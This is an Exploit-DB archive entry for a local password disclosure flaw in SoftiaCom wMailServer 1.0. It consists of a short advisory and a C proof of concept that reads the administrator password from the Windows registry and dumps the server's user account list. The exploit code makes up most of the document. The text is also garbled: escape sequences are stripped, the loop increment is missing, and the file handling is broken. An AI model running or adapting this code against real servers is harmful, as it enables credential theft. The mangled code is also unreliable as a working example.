https://www.exploit-db.com/exploits/25961

漏洞细节尚未披露

source: http://www.securityfocus.com/bid/14212/info

SoftiaCom WMailserver is prone to a local information disclosure vulnerability. The application stores passwords in the windows registry.

A local attacker may exploit this issue to disclose potentially sensitive information. 

/***********************************
# Vulnerability: Local Password Disclosure
# Discovered on: July 9, 2005
# Discovered & Coded by: fRoGGz - SecuBox Labs
# Severity: Normal
**************************************/

#include <windows.h>
#include <stdio.h>

#define BUF 100

LONG lRet;
HKEY hKey;
DWORD dwBuf=BUF;
char pwd[BUF], fichier[BUF], donnees[BUF];

int main()
{

if( RegOpenKeyEx( HKEY_CURRENT_CONFIG,"Software\Darsite\MAILSRV\Admin",0,KEY_QUERY_VALUE,&hKey) !=ERROR_SUCCESS )
{
fprintf( stdout, "Aucune clef wMailServer en vue !n" );
return -1;
}

if( RegQueryValueEx( hKey,"",NULL,NULL,(BYTE *)&pwd,&dwBuf) != ERROR_SUCCESS )
lstrcpy( pwd,"Viden" );

fprintf( stdout, "nn-------------------------------------------n" );
fprintf( stdout, "SoftiaCom Software - wMailServer v1.0n" );
fprintf( stdout, "Local Password Disclosure Vulnerabilitynn" );
fprintf( stdout, "Discovered & coded by fRoGGz - SecuBox Labsnn" );
fprintf( stdout, "-------------------------------------------nn" );
fprintf( stdout, "Mot de passe Administrateurt: %sn", pwd );

int i;
FILE *fp;
char ch[100];

strcpy(fichier,"\WINNT\MAILSRV\userlist");

if((fp=fopen(fichier,"rb")) == NULL)
{
printf("Pas cool !n");
return -1;
}

for(i=0;i<99;i )
{
ch[i]=getc(fp);
strcpy(donnees,ch);
fclose(fp);
}

fprintf( stdout, "nListe des comptes utilisateursnn %sn", donnees );
return 0;
}